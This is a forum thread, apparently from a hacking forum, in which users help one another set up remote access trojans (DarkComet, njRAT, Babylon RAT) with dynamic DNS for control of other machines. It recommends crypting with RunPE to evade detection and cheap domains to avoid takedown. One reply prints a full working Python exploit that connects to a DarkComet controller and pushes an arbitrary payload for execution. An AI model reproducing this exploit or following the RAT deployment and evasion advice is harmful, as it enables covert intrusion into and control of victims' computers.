Hey guys I'm having difficulty setting up. Dark comet in Windows 10 I have all my ports forwared the local DNS is set up through noip ' I'm using a zapto.org domain I'm still not getting any connections through my friends computer nor mine it uesed to work flawlessly before I upgraded to Windows 10 my firewall is disabled can't think of any reason why I'm not getting a connection thanks HF
Just don't.
Don't use DarkComet.
As a free RAT, i would recommand using Babylon RAT or njRAT.
I will have to dabble with nj rat where can I find the DL link ?
we cant stress this enough. DO NOT USE DARKCOMET
Why not use darkcomet? I've used it in the past no problem. I'm using babylon now though and babylon is aloooot better
Thank you all, I will update you all on my quest.

Because simply by opening Darkcomet, a person can hack you and install a rat on your PC.

What?

Read this python code:
Code # DarkComet RAT - Exploiter
# written by Slayer616
# Thanks to: Opcodez, Zacherl, steve1020, 2sly, Protocol, all other friends/coders/supporters
import socket
import os
print("-----------------------------------------------------------")
print("DarkComet RAT Exploiter")
print("Coded by Slayer616")
print("-----------------------------------------------------------")
sIP = input("Type in IP of the Remote PC: ")
sPort = input("Type in Port of the Remote PC: ")
sFile = input("Type in full path to Payload: ")
if os.path.exists(sFile):
bLen= os.path.getsize(sFile)
if bLen < 8097:
if sPort.isdigit():
print("Connecting to %s on Port %s" % (sIP,sPort))
sSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sSock.connect((sIP, int(sPort)))
print("Connected to Remote PC!")
sData = str(sSock.recv(1024),'ASCII')
if sData == "IDTYPE":
print("Valid Client! Now sending request!")
sSock.send(bytes("TRANSFERupnp.exe|DLFILE|562|7","ASCII"))
sSock.recv(1024)
sData = "Size:%s" % (str(bLen))
sSock.send(bytes(sData,"ASCII"))
sSock.recv(1024)
f = open(sFile,"rb")
sData = f.read()
f.close()
sSock.send(sData)
sSock.close()
print("Finished! Now wait until Client.exe restarts!")
else:
print("This is not a valid DarkComet Client!")
except:
print("Couldnt connect to Remote PC!")
else:
print("Port is not a valid Integer!")
else:
print("Payload is too great! Use one with less then 8Kbyte!")
else:
print("File not found!")
They don't even need your IP, as darkcomet has a banner that can be picked up automatically.
One last question with NJRat will I be using no-ip as my dns or will I need another wise?

No-ip will eventually take action against anyone using it for something like a botnet.
Either buy a cheap domain to use for like $3, or find a different dynamic IP provider.

Thanks for the heads up
DarkComet simply won't work on Win10.
However if you run it with a RunPe (eg crypt it), it will fix the issues because of the manual mapping of the server.
